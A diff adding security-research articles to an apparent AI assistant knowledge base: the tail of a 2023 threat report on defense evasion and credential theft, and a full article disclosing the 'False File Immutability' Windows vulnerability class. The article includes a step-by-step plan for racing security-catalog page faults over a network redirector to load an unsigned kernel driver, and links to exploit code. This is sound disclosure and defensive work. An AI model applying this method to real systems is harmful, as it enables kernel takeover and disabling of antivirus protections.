+ - Significant research devoted to bypassing, tampering with, or disabling security instrumentation
+ - Increased reliance on credential theft to enable business email and cloud-resource compromise, places where endpoint visibility is not generally available
+
+### Defense Evasion 
+
+During the development of our inaugural Global Threat Report last year, we were surprised to see how often adversaries used a defense evasion capability regardless of the industry or region they targeted. After analyzing events from thousands of different environments all over the world, we better understood that defense evasion was a reaction to the state of security. It was a trend we saw again this year, just one of several forces shaping the threat landscape today.
+
+More than 43% of the techniques and procedures we observed this year were forms of defense evasion, with [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218/) representing almost half of those events. These utilities are present on all operating systems and facilitate code execution– some common examples include software that interprets scripts, launches DLLs, and executes web content.
+
+![Figure 1. Top defense evasion techniques](/assets/images/fall-2023-global-threat-report-outro/image2.png)
+
+[BLISTER](https://www.elastic.co/security-labs/revisiting-blister-new-developments-of-the-blister-loader), which is a malware loader associated with financially-motivated intrusions, relied on the *rundll32.exe* proxy built into every version of Microsoft Windows to launch their backdoor this year. The BLISTER loader is a useful example because its authors invested a great deal of energy encrypting and obfuscating their malicious code inside a benign application. They fraudulently signed their “franken-payload” to ensure human and machine mitigations didn’t interfere. 
+
+### Endpoint tampering
+
+This year we also saw the popularity of Bring Your Own Vulnerable Driver (BYOVD), which was [described](https://www.elastic.co/security-labs/forget-vulnerable-drivers-admin-is-all-you-need) by [Gabe Landau](https://twitter.com/GabrielLandau) in a recent publication and provides a way to load an exploitable driver on Windows systems. Drivers run with system-level privileges but what’s more interesting is how vulnerable drivers can be used to disable or [tamper with security tools](https://thehackernews.com/2023/04/ransomware-hackers-using-aukill-tool-to.html). It won’t be long before more adversaries pivot from using this capability to launch malware and instead use it to uninstall security sensors. 
+
+To see this in action, look no further than your friendly neighborhood ransomware-as-a-service ecosystem. SOCGHOLISH, the group associated with BLISTER coincidentally, is one of multitudes that grew out of startup digs and became a criminal enterprise. Most of the ransomware we see is related to these kinds of services– and even as one gets disrupted it seems another is always emerging to take its place. 
+
+![Figure 2. Most frequently seen ransomware infections](/assets/images/fall-2023-global-threat-report-outro/image1.png)
+
+This is, in a very literal sense, a human phenomenon. Threats that endure periods of security innovation and disruption seem to do so by learning not to be caught, and one strategy of mature threats is to move edge-ward to Internet-facing systems, network devices, appliances, or cloud platforms where visibility is less mature. Consider the cost and relative risk of the following options: develop a feature-rich multiplatform implant with purposeful capabilities or purchase account credentials from a broker.
+
+### Credential Access
+
+Although only about 7% of the data we analyzed involved one form of credential theft or another, 80% of those leveraged built-in operating system features. With functioning stolen credentials, many threat groups can directly interact with an enterprise’s critical data to access email, steal intellectual property, or deploy cloud resources. 
+
+![Figure 3. Commonly seen credential access techniques](/assets/images/fall-2023-global-threat-report-outro/image3.png)
+
+Abusing stolen credentials has more utility today than ever before, given the widespread adoption of cloud for storage, productivity, code management, and authentication to third party services. For those threats that prioritize a low profile over other goals, credential theft is a shortcut with low exposure.
+
+Insights like these, and many others, can be found in the 2023 Global Threat Report along with forecasts and threat profiles. Elastic Security Labs shares [malware research](https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor), [tools](https://www.elastic.co/security-labs/unpacking-icedid), [intelligence analyses](https://www.elastic.co/security-labs/inital-research-of-jokerspy), as well as [detection science](https://www.elastic.co/security-labs/peeling-back-the-curtain-with-call-stacks) and [machine learning/artificial intelligence](https://www.elastic.co/security-labs/accelerating-elastic-detection-tradecraft-with-llms) research.
+ 
+You can [download the report](https://www.elastic.co/explore/security-without-limits/2023-global-threat-report) or check out our [other assets](http://elastic.co/gtr). Reach out to us on [X](https://twitter.com/elasticseclabs) and get a deeper dive on the GTR results with our webinar [Prepare for tomorrow: Insights from the 2023 Elastic Global Threat Report](https://www.elastic.co/virtual-events/insights-from-the-2023-elastic-global-threat-report). 
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/false_file_immutability.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/false_file_immutability.md
new file mode 100644
index 0000000000000..17830f2f3dab7
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/false_file_immutability.md
@@ -0,0 +1,427 @@
+---
+title: "Introducing a New Vulnerability Class: False File Immutability"
+slug: "false-file-immutability"
+date: "2024-07-11"
+description: "This article introduces a previously-unnamed class of Windows vulnerability that demonstrates the dangers of assumption and describes some unintended security consequences."
+author:
+  - slug: gabriel-landau
+image: "Security Labs Images 36.jpg"
+category:
+  - slug: security-research
+  - slug: vulnerability-updates
+---
+
+# Introduction
+
+This article will discuss a previously-unnamed vulnerability class in Windows, showing how long-standing incorrect assumptions in the design of core Windows features can result in both undefined behavior and security vulnerabilities. We will demonstrate how one such vulnerability in the Windows 11 kernel can be exploited to achieve arbitrary code execution with kernel privileges.
+
+
+# Windows file sharing
+
+When an application opens a file on Windows, it typically uses some form of the Win32 [**CreateFile**](https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew) API.
+
+``` c++
+HANDLE CreateFileW(
+  [in]           LPCWSTR               lpFileName,
+  [in]           DWORD                 dwDesiredAccess,
+  [in]           DWORD                 dwShareMode,
+  [in, optional] LPSECURITY_ATTRIBUTES lpSecurityAttributes,
+  [in]           DWORD                 dwCreationDisposition,
+  [in]           DWORD                 dwFlagsAndAttributes,
+  [in, optional] HANDLE                hTemplateFile
+);
+```
+
+Callers of **CreateFile** specify the access they want in **dwDesiredAccess**. For example, a caller would pass **FILE_READ_DATA** to be able to read data, or **FILE_WRITE_DATA** to be able to write data. The full set of access rights are [documented](https://learn.microsoft.com/en-us/windows/win32/fileio/file-access-rights-constants) on the Microsoft Learn website.
+
+In addition to passing **dwDesiredAccess**, callers must pass a “sharing mode” in **dwShareMode**, which consists of zero or more of **FILE_SHARE_READ**, **FILE_SHARE_WRITE**, and **FILE_SHARE_DELETE**. You can think of a sharing mode as the caller declaring “I’m okay with others doing X to this file while I’m using it,” where X could be reading, writing, or renaming. For example, a caller that passes **FILE_SHARE_WRITE** allows others to write the file while they are working with it.
+
+As a file is opened, the caller’s **dwDesiredAccess** is tested against the **dwShareMode** of all existing file handles. Simultaneously, the caller’s **dwShareMode** is tested against the previously-granted **dwDesiredAccess** of all existing handles to that file. If either of these tests fail, then **CreateFile** fails with a sharing violation.
+
+Sharing isn’t mandatory. Callers can pass a share mode of zero to obtain exclusive access. Per Microsoft [documentation](https://learn.microsoft.com/en-us/windows/win32/fileio/creating-and-opening-files):
+
+> An open file that is not shared (dwShareMode set to zero) cannot be opened again, either by the application that opened it or by another application, until its handle has been closed. This is also referred to as exclusive access.
+
+
+## Sharing enforcement
+
+In the kernel, sharing is enforced by filesystem drivers. As a file is opened, it’s the responsibility of the filesystem driver to call [**IoCheckShareAccess**](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-iocheckshareaccess) or [**IoCheckLinkShareAccess**](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-iochecklinkshareaccess) to see whether the requested **DesiredAccess**/**ShareMode** tuple is compatible with any existing handles to the file being opened. [NTFS](https://learn.microsoft.com/en-us/windows-server/storage/file-server/ntfs-overview) is the primary filesystem on Windows, but it’s closed-source, so for illustrative purposes we’ll instead look at Microsoft’s FastFAT sample code performing [the same check](https://github.com/Microsoft/Windows-driver-samples/blob/622212c3fff587f23f6490a9da939fb85968f651/filesys/fastfat/create.c#L6822-L6884). Unlike an IDA decompilation, it even comes with comments!
+
+``` c++
+//
+//  Check if the Fcb has the proper share access.
+//
+
+return IoCheckShareAccess( *DesiredAccess,
+                           ShareAccess,
+                           FileObject,
+                           &FcbOrDcb->ShareAccess,
+                           FALSE );
+```
+
+In addition to traditional read/write file operations, Windows lets applications map files into memory. Before we go deeper, it’s important to understand that [section objects](https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/section-objects-and-views) are kernel parlance for [file mappings](https://learn.microsoft.com/en-us/windows/win32/memory/file-mapping); they are the same thing. This article focuses on the kernel, so it will primarily refer to them as section objects.
+
+There are two types of section objects - data sections and executable image sections. Data sections are direct 1:1 mappings of files into memory. The file’s contents will appear in memory exactly as they do on disk. Data sections also have uniform memory permissions for the entire memory range. With respect to the underlying file, data sections can be either read-only or read-write. A read-write view of a file enables a process to read or write the file’s contents by reading/writing memory within its own address space.
+
+Executable image sections (sometimes abbreviated to image sections) prepare [PE files](https://learn.microsoft.com/en-us/windows/win32/debug/pe-format) to be executed. Image sections must be created from PE files. Examples of PE files include EXE, DLL, SYS, CPL, SCR, and OCX files. The kernel processes the PEs specially to prepare them to be executed. Different PE regions will be mapped in memory with different page permissions, depending on their metadata. Image views are [copy-on-write](https://en.wikipedia.org/wiki/Copy-on-write), meaning any changes in memory will be saved to the process’s private working set — never written to the backing PE.
+
+Let’s say application A wants to map a file into memory with a data section. First, it opens that file with an API such as **ZwCreateFile**, which returns a file handle. Next, it passes this file handle to an API such as **ZwCreateSection** which creates a section object that describes how the file will be mapped into memory; this yields a section handle. The process then uses the section handle to map a “view” of that section into the process address space, completing the memory mapping.
+
+![Diagram showing how a file is mapped into memory](/assets/images/false-file-immutability/image9.png)
+
+Once the file is successfully mapped, process A can close both the file and section handles, leaving zero open handles to the file. If process B later wants to use the file without the risk of it being modified externally, it would omit **FILE_SHARE_WRITE** when opening the file. **IoCheckLinkShareAccess** looks for open file handles, but since the handles were previously closed, it will not fail the operation.
+
+This creates a problem for file sharing. Process B thinks it has a file open without risk of external modification, but process A can modify it through the memory mapping. To account for this, the filesystem must also call [**MmDoesFileHaveUserWritableReferences**](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-mmdoesfilehaveuserwritablereferences). This checks whether there are any active writable file mappings to the given file. We can see this check in the FastFAT example [here](https://github.com/Microsoft/Windows-driver-samples/blob/622212c3fff587f23f6490a9da939fb85968f651/filesys/fastfat/create.c#L6858-L6870):
+
+``` c++
+//
+//  Do an extra test for writeable user sections if the user did not allow
+//  write sharing - this is neccessary since a section may exist with no handles
+//  open to the file its based against.
+//
+
+if ((NodeType( FcbOrDcb ) == FAT_NTC_FCB) &&
+    !FlagOn( ShareAccess, FILE_SHARE_WRITE ) &&
+    FlagOn( *DesiredAccess, FILE_EXECUTE | FILE_READ_DATA | FILE_WRITE_DATA | FILE_APPEND_DATA | DELETE | MAXIMUM_ALLOWED ) &&
+    MmDoesFileHaveUserWritableReferences( &FcbOrDcb->NonPaged->SectionObjectPointers )) {
+
+    return STATUS_SHARING_VIOLATION;
+}
+```
+
+Windows requires PE files to be immutable (unmodifiable) while they are running. This prevents EXEs and DLLs from being changed on disk while they are running in memory. Filesystem drivers must use the [**MmFlushImageSection**](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-mmflushimagesection) function to check whether there are any active image mappings of a PE before allowing **FILE_WRITE_DATA** access. We can see this in the [FastFAT example code](https://github.com/Microsoft/Windows-driver-samples/blob/622212c3fff587f23f6490a9da939fb85968f651/filesys/fastfat/create.c#L3572-L3593), and on [Microsoft Learn](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/executable-images).
+
+``` c++
+//
+//  If the user wants write access access to the file make sure there
+//  is not a process mapping this file as an image. Any attempt to
+//  delete the file will be stopped in fileinfo.c
+//
+//  If the user wants to delete on close, we must check at this
+//  point though.
+//
+
+if (FlagOn(*DesiredAccess, FILE_WRITE_DATA) || DeleteOnClose) {
+
+    Fcb->OpenCount += 1;
+    DecrementFcbOpenCount = TRUE;
+
+    if (!MmFlushImageSection( &Fcb->NonPaged->SectionObjectPointers,
+                              MmFlushForWrite )) {
+
+        Iosb.Status = DeleteOnClose ? STATUS_CANNOT_DELETE :
+                                      STATUS_SHARING_VIOLATION;
+        try_return( Iosb );
+    }
+}
+```
+
+Another way to think of this check is that **ZwMapViewOfSection(SEC_IMAGE)** implies no-write-sharing as long as the view exists.
+
+
+# Authenticode
+
+The [Windows Authenticode Specification](https://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/authenticode_pe.docx) describes a way to employ cryptography to “sign” PE files. A “digital signature” cryptographically attests that the PE was produced by a particular entity. Digital signatures are tamper-evident, meaning that any material modification of signed files should be detectable because the digital signature will no longer match. Digital signatures are typically appended to the end of PE files.
+
+![Authenticode specification diagram showing a signature embedded within a PE](/assets/images/false-file-immutability/image19.png)
+
+Authenticode can’t apply traditional hashing (e.g. **sha256sum**) in this case, because the act of appending the signature would change the file’s hash, breaking the signature it just generated. Instead, the Authenticode specification describes an algorithm to skip specific portions of the PE file that will be changed during the signing process. This algorithm is called **authentihash**. You can use authentihash with any hashing algorithm, such as SHA256. When a PE file is digitally signed, the file’s authentihash is what’s actually signed.
+
+
+## Code integrity
+
+Windows has a few different ways to validate Authenticode signatures. User mode applications can call [**WinVerifyTrust**](https://learn.microsoft.com/en-us/windows/win32/api/wintrust/nf-wintrust-winverifytrust) to validate a file’s signature in user mode. The Code Integrity (CI) subsystem, residing in ```ci.dll```,  validates signatures in the kernel. If [Hypervisor-Protected Code Integrity](https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/device-guard-and-credential-guard) is running, the Secure Kernel employs ```skci.dll``` to validate Authenticode. This article will focus on Code Integrity (```ci.dll```) in the regular kernel.
+
+Code Integrity provides both Kernel Mode Code Integrity and User Mode Code Integrity, each serving a different set of functions.
+
+Kernel Mode Code Integrity (KMCI):
+ - Enforces [Driver Signing Enforcement](https://learn.microsoft.com/en-us/windows-hardware/drivers/install/driver-signing) and the [Vulnerable Driver Blocklist](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/microsoft-recommended-driver-block-rules#microsoft-vulnerable-driver-blocklist)
+
+User Mode Code Integrity (UMCI):
+ - CI validates the signatures of EXEs and DLLs before allowing them to load
+ - Enforces [Protected Processes and Protected Process Light](https://learn.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10#protected-processes) signature requirements
+ - Enforces **ProcessSignaturePolicy** mitigation ([**SetProcessMitigationPolicy**](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setprocessmitigationpolicy))
+ - Enforces [INTEGRITYCHECK](https://learn.microsoft.com/en-us/cpp/build/reference/integritycheck-require-signature-check?view=msvc-170) for [FIPS 140-2 modules](https://x.com/GabrielLandau/status/1668353640833114131).
+ - Exposed to consumers as [Smart App Control](https://learn.microsoft.com/en-us/windows/apps/develop/smart-app-control/overview)
+ - Exposed to businesses as [App Control for Business](https://learn.microsoft.com/en-us/mem/intune/protect/endpoint-security-app-control-policy) (formerly WDAC)
+
+KMCI and UMCI implement different policies for different scenarios. For example, the policy for Protected Processes is different from that of INTEGRITYCHECK.
+
+
+# Incorrect assumptions
+
+Microsoft [documentation](https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea) implies that files successfully opened without write sharing can’t be modified by another user or process.
+
+```
+FILE_SHARE_WRITE
+0x00000002
+Enables subsequent open operations on a file or device to request write access. Otherwise, other processes cannot open the file or device if they request write access.
+```
+
+If this flag is not specified, but the file or device has been opened for write access or has a file mapping with write access, the function fails.
+
+*Above, we discussed how sharing is enforced by the filesystem, but what if the filesystem doesn’t know that the file’s been modified?*
+
+Like most user mode memory, the Memory Manager (MM) in the kernel may page-out portions of file mappings when it deems necessary, such as when the system needs more free physical memory. Both data and executable image mappings may be paged-out. Executable image sections can never modify the backing file, so they’re effectively treated as read-only with respect to the backing PE file. As mentioned before, image sections are copy-on-write, meaning any in-memory changes immediately create a private copy of the given page.
+
+When the memory manager needs to page-out a page from an image section, it can use the following decision tree:
+ - Never modified?  Discard it. We can read the contents back from the immutable file on disk.
+ - Modified?  Save private copy it to the pagefile.
+   - Example: If a security product hooks a function in ```ntdll.dll```, MM will create a private copy of each modified page. Upon page-out, private pages will be written to the pagefile.
+
+If those paged-out pages are later touched, the CPU will issue a page fault and the MM will restore the pages.
+ - Page never modified?  Read the original contents back from the immutable file on disk.
+ - Page private?  Read it from the pagefile.
+
+Note the following exception: The memory manager may treat PE-relocated pages as unmodified, dynamically reapplying relocations during page faults.
+
+
+## Page hashes
+
+Page hashes are a list of hashes of each 4KB page within a PE file. Since pages are 4KB, page faults typically occur on 4KB of data at a time. Full Authenticode verification requires the entire contiguous PE file, which isn’t available during a page fault. Page hashes allow the MM to validate hashes of individual pages during page faults.
+
+There are two types of page hashes, which we’ve coined static and dynamic. Static page hashes are stored within a PE’s digital signature if the developer passes ```/ph``` to [```signtool```](https://learn.microsoft.com/en-us/windows/win32/seccrypto/signtool). By pre-computing these, they are immediately available to the MM and CI upon module load.
+
+CI can also compute them on-the-fly during signature validation, a mechanism we’re calling dynamic page hashes. Dynamic page hashes give CI flexibility to enforce page hashes even for files that were never signed with them.
+
+Page hashes are not free - they use CPU and slow down page faults. They’re not used in most cases.
+
+
+# Attacking code integrity
+
+Imagine a scenario where a ransomware operator wants to ransom a hospital, so they send a phishing email to a hospital employee. The employee opens the email attachment and enables macros, running the ransomware. The ransomware employs a UAC bypass to immediately elevate to admin, then attempts to terminate any security software on the system so it can operate unhindered. Anti-Malware services run as [Protected Process Light](https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-) (PPL), protecting them from tampering by malware with admin rights, so the ransomware can’t terminate the Anti-Malware service.
+
+If the ransomware could also run as a PPL, it could terminate the Anti-Malware product. The ransomware can’t launch itself directly as a PPL because UMCI prevents improperly-signed EXEs and DLLs from loading into PPL, as we discussed above. The ransomware might try to inject code into a PPL by modifying an EXE or DLL that’s already running, but the aforementioned **MmFlushImageSection** ensures in-use PE files remain immutable, so this isn’t possible.
+
+We previously discussed how the filesystem is responsible for sharing checks. *What would happen if an attacker were to move the filesystem to another machine?*
+
+[Network redirectors](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/what-is-a-network-redirector-) allow the use of network paths with any API that accepts file paths. This is very convenient, allowing users and applications to easily open and memory-map files over the network. Any resulting I/O is transparently redirected to the remote machine. If a program is launched from a network drive, the executable images for the EXE and its DLLs will be transparently pulled from the network.
+
+When a network redirector is in use, the server on the other end of the pipe needn’t be a Windows machine. It could be a Linux machine running [Samba](https://en.wikipedia.org/wiki/Samba_(software)), or even a python [impacket script](https://github.com/fortra/impacket/blob/d71f4662eaf12c006c2ea7f5ec09b418d9495806/examples/smbserver.py) that “speaks” the [SMB network protocol](https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview). This means the server doesn’t have to honor Windows filesystem sharing semantics.
+
+An attacker can employ a network redirector to modify a PPL’s DLL server-side, bypassing sharing restrictions. This means that PEs backing an executable image section are incorrectly assumed to be immutable. This is a class of vulnerability that we are calling **False File Immutability** (FFI).
+
+
+## Paging exploitation
+
+If an attacker successfully exploits False File Immutability to inject code into an in-use PE, wouldn’t page hashes catch such an attack?  The answer is: sometimes. If we look at the following table, we can see that page hashes are enforced for kernel drivers and Protected Processes, but not for PPL, so let’s pretend we’re an attacker targeting PPL.
+
+| | Authenticode | Page hashes |
+| ----- | ----- | ----- |
+| Kernel drivers | ✅ | ✅ |
+| Protected Processes (PP-Full) | ✅ | ✅ |
+| Protected Process Light (PPL) | ✅ | ❌ |
+
+Last year at Black Hat Asia 2023 ([abstract](https://www.blackhat.com/asia-23/briefings/schedule/#ppldump-is-dead-long-live-ppldump-31052), [slides](http://i.blackhat.com/Asia-23/AS-23-Landau-PPLdump-Is-Dead-Long-Live-PPLdump.pdf), [recording](https://www.youtube.com/watch?v=5xteW8Tm410)), we disclosed a vulnerability in the Windows kernel, showing how bad assumptions in paging can be exploited to inject code into PPL, defeating security features like [LSA](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection) & [Anti-Malware Process Protection](https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-). The attack leveraged False File Immutability assumptions for DLLs in PPLs, as we just described, though we hadn’t yet named the vulnerability class.
+
+![A diagram of the PPLFault exploit](/assets/images/false-file-immutability/image5.png)
+
+Alongside the presentation, we released the [PPLFault exploit](https://github.com/gabriellandau/PPLFault) which demonstrates the vulnerability by dumping the memory of an otherwise-protected PPL. We also released the GodFault exploit chain, which combines the PPLFault Admin-to-PPL exploit with the AngryOrchard PPL-to-kernel exploit to achieve full read/write control of physical memory from user mode. We did this to motivate Microsoft to take action on a vulnerability that MSRC [declined to fix](https://www.elastic.co/security-labs/forget-vulnerable-drivers-admin-is-all-you-need) because it did not meet their [servicing criteria](https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria). Thankfully, the Windows Defender team at Microsoft stepped up, [releasing a fix](https://x.com/GabrielLandau/status/1757818200127946922) in February 2024 that enforces dynamic page hashes for executable images loaded over network redirectors, breaking PPLFault.
+
+
+# New research
+
+Above, we discussed Authenticode signatures embedded within PE files. In addition to embedded signatures, Windows supports a form of detached signature called a [security catalog](https://learn.microsoft.com/en-us/windows-hardware/drivers/install/catalog-files). Security catalogs (.cat files) are essentially a list of signed authentihashes. Every PE with an authentihash in that list is considered to be signed by that signer. Windows keeps a large collection of catalog files in ```C:\Windows\System32\CatRoot``` which CI loads, validates, and caches.
+
+![Simplified structure of a security catalog](/assets/images/false-file-immutability/image7.png)
+
+![A security catalog rendered through Windows Explorer](/assets/images/false-file-immutability/image21.png)
+
+A typical Windows system has over a thousand catalog files, many containing dozens or hundreds of authentihashes.
+
+![Security catalogs on a Windows 11 23H2 system](/assets/images/false-file-immutability/image16.png)
+
+To use a security catalog, Code Integrity must first load it. This occurs in a few discrete steps. First, CI maps the file into kernel memory using **ZwOpenFile**, **ZwCreateSection**, and **ZwMapViewOfSection**. Once mapped, it validates the catalog’s digital signature using **CI!MinCrypK_VerifySignedDataKModeEx**. If the signature is valid, it parses the hashes with **CI!I_MapFileHashes**.
+
+![The Code Integrity catalog parsing process](/assets/images/false-file-immutability/image10.png)
+
+Breaking this down, we see a few key insights. First, **ZwCreateSection(SEC_COMMIT)** tells us that CI is creating a data section, not an image section. This is important because there is no concept of page hashes for data sections.
+
+Next, the file is opened without **FILE_SHARE_WRITE**, meaning write sharing is denied. This is intended to prevent modification of the security catalog during processing. However, as we have shown above, this is a bad assumption and another example of False File Immutability. It should be possible, in theory, to perform a PPLFault-style attack on security catalog processing.
+
+
+## Planning the attack
+
+![](/assets/images/false-file-immutability/image11.png)
+
+The general flow of the attack is as follows:
+ 1. The attacker will plant a security catalog on a storage device that they control. They will install a symbolic link to this catalog in the ```CatRoot``` directory, so Windows knows where to find it.
+ 2. The attacker asks the kernel to load a malicious unsigned kernel driver.
+ 3. Code Integrity attempts to validate the driver, but it can’t find a signature or trusted authentihash, so it re-scans the CatRoot directory and finds the attacker’s new catalog.
+ 4. CI maps the catalog into kernel memory and validates its signature. This generates page faults which are sent to the attacker’s storage device. The storage device returns a legitimate Microsoft-signed catalog.
+ 5. The attacker empties the system working set, forcing all the previously-fetched catalog pages to be discarded.
+ 6. CI begins parsing the catalog, generating new page faults. This time, the storage device injects the authentihash of their malicious driver.
+ 7. CI finds the malicious driver’s authentihash in the catalog and loads the driver. At this point, the attacker has achieved arbitrary code execution in the kernel.
+
+
+## Implementation and considerations
+
+The plan is to use a PPLFault-style attack, but there are some important differences in this situation. PPLFault used an [opportunistic lock](https://learn.microsoft.com/en-us/windows/win32/fileio/opportunistic-locks) (oplock) to deterministically freeze the victim process’s initialization. This gave the attacker time to switch over to the payload and flush the system working set. Unfortunately, we couldn’t find any good opportunities for oplocks here. Instead, we’re going to pursue a probabilistic approach: rapidly toggling the security catalog between the malicious and benign versions.
+
+![The catalog being toggled between benign and malicious versions; only one hash changes](/assets/images/false-file-immutability/image12.png)
+
+The verification step touches every page of the catalog, which means all of those pages will be resident in memory when parsing begins. If the attacker changes the catalog on their storage device, it won’t be reflected in memory until after a subsequent page fault. To evict these pages from kernel memory, the attacker must empty the working set between **MinCrypK_VerifySignedDataKModeEx** and **I_MapFileHashes**.
+
+This approach is inherently a race condition. There’s no built-in delays between signature verification and catalog parsing - it’s a tight race. We’ll need to employ several techniques to widen our window of opportunity.
+
+Most security catalogs on the system are small, a few kilobytes. By choosing a large 4MB catalog, we can greatly increase the amount of time that CI spends parsing. Assuming catalog parsing is linear, we can choose an authentihash near the end of the catalog to maximize the time between signature verification and when CI reaches our tampered page. Further, we will create threads for each CPU on the system whose sole purpose is to consume CPU cycles. These threads run at higher priority than CI, so CI will be starved of CPU time. There will be one thread dedicated to repeatedly flushing pages from the system’s working set, and one thread repeatedly attempting to load the unsigned driver.
+
+This attack has two main failure modes. First, if the payload Authentihash is read during the signature check, then the signature will be invalid and the catalog will be rejected.
+
+![Code Integrity rejecting a tampered security catalog](/assets/images/false-file-immutability/image17.png)
+
+Next, if an even number of toggles occur (including zero) between signature validation and parsing, then CI will parse the benign hash and reject our driver.
+
+![Passing the signature check, but the benign catalog is parsed](/assets/images/false-file-immutability/image6.png)
+
+The attacker wins if CI validates a benign catalog then parses a malicious one.
+
+![Code Integrity validating a benign catalog, then parsing a malicious one](/assets/images/false-file-immutability/image20.png)
+
+
+## Exploit demo
+
+We named the exploit **ItsNotASecurityBoundary** as an homage to MSRC's [policy](https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria) that "Administrator-to-kernel is not a security boundary.”  The code is in GitHub [here](https://github.com/gabriellandau/ItsNotASecurityBoundary).
+
+Demo video [here](https://drive.google.com/file/d/13Uw38ZrNeYwfoIuD76qlLgyXP8kRc8Nz/view?usp=sharing).
+
+
+# Understanding these vulnerabilities
+
+In order to properly defend against these vulnerabilities, we first need to understand them better.
+
+A double-read (aka double-fetch) vulnerability can occur when victim code reads the same value out of an attacker-controlled buffer more than once. The attacker may change the value of this buffer between the reads, resulting in unexpected victim behavior.
+
+Imagine there is a page of memory shared between two processes for an IPC mechanism. The client and server send data back and forth using the following struct. To send an IPC request, a client first writes a request struct into the shared memory page, then signals an event to notify the server of a pending request.
+
+``` c
+struct IPC_PACKET
+{
+    SIZE_T length;
+    UCHAR data[];
+};
+```
+
+A double-read attack could look something like this:
+
+![An example of a double-read exploit using shared memory](/assets/images/false-file-immutability/image18.png)
+
+First, the attacking client sets a packet’s structure’s length field to 16 bytes, then signals the server to indicate that a packet is ready for processing.  The victim server wakes up and allocates a 16-byte buffer using ```malloc(pPacket->length)```.  Immediately afterwards, the attacker changes the length field to 32.  Next, the victim server attempts to copy the packet’s contents into the the new buffer by calling ```memcpy(pBuffer, pPacket->data, pPacket->length)```, re-reading the value in ```pPacket->length```, which is now 32.  The victim ends up copying 32 bytes into a 16-byte buffer, overflowing it.
+
+Double-read vulnerabilities frequently apply to shared-memory scenarios. They commonly occur in drivers that operate on user-writable buffers. Due to False File Immutability, developers need to be aware that their scope is actually much wider, and includes all files writable by attackers. Denying write sharing does not necessarily prevent file modification.
+
+
+## Affected Operations
+
+What types of operations are affected by False File Immutability?
+
+| Operation | API | Mitigations |
+| ----- | ----- | ----- |
+| Image Sections | **CreateProcess** **LoadLibrary** | 1. Enable Page Hashes |
+| Data Sections | **MapViewOfFile** **ZwMapViewOfSection** | 1. Avoid double reads\ 2. Copy the file to a heap buffer before processing\ 3. Prevent paging via MmProbeAndLockPages/VirtualLock |
+| Regular I/O | **ReadFile** **ZwReadFile** | 1. Avoid double reads\  2. Copy the file to a heap buffer before processing |
+
+
+## What else could be vulnerable?
+
+Looking for potentially-vulnerable calls to **ZwMapViewOfSection** in the NT kernel yields quite a few interesting functions:
+
+![Potentially-vulnerable uses of **ZwMapViewOfSection** within the NT kernel](/assets/images/false-file-immutability/image8.png)
+
+If we expand our search to regular file I/O, we find even more candidates. An important caveat, however, is that **ZwReadFile** may be used for more than just files. Only uses on files (or those which could be coerced into operating on files) could be vulnerable.
+
+![Potentially-vulnerable uses of **ZwReadFile** within the NT kernel](/assets/images/false-file-immutability/image14.png)
+
+Looking outside of the NT kernel, we can find other drivers to investigate:
+
+![Potentially-vulnerable uses of **ZwReadFile** in Windows 11 kernel drivers](/assets/images/false-file-immutability/image2.png)
+
+![Potentially-vulnerable uses of **ZwMapViewOfSection** in Windows 11 kernel drivers](/assets/images/false-file-immutability/image1.png)
+
+
+## Don’t forget about user mode
+
+We’ve mostly been discussing the kernel up to this point, but it’s important to note that any user mode application that calls **ReadFile**, **MapViewOfFile**, or **LoadLibrary** on an attacker-controllable file, denying write sharing for immutability, may be vulnerable. Here’s a few hypothetical examples.
+
+
+### MapViewOfFile
+
+Imagine an application that is split into two components - a low-privileged worker process with network access, and a privileged service that installs updates. The worker downloads updates and stages them to a specific folder. When the privileged service sees a new update staged, it first validates the signature before installing the update. An attacker could abuse FFI to modify the update after the signature check.
+
+
+### ReadFile
+
+Since files are subject to double-read vulnerabilities, anything that parses complex file formats may be vulnerable, including antivirus engines and search indexers.
+
+
+### LoadLibrary
+
+Some applications rely on UMCI to prevent attackers from loading malicious DLLs into their processes. As we’ve shown with PPLFault, FFI can defeat UMCI.
+
+
+# Stopping the exploit
+
+Per their official servicing guidelines, MSRC won’t service Admin -> Kernel vulnerabilities by default. In this parlance, servicing means “fix via security update.”  This type of vulnerability, however, allows malware to bypass [AV Process Protections](https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-), leaving AV and EDR vulnerable to instant-kill attacks.
+
+As a third-party, we can’t patch Code Integrity, so what can we do to protect our customers? To mitigate **ItsNotASecurityBoundary**, we created **FineButWeCanStillEasilyStopIt**, a filesystem minifilter driver that prevents Code Integrity from opening security catalogs over network redirectors. You can find it on GitHub [here](https://github.com/gabriellandau/ItsNotASecurityBoundary/tree/main/FineButWeCanStillEasilyStopIt). 
+
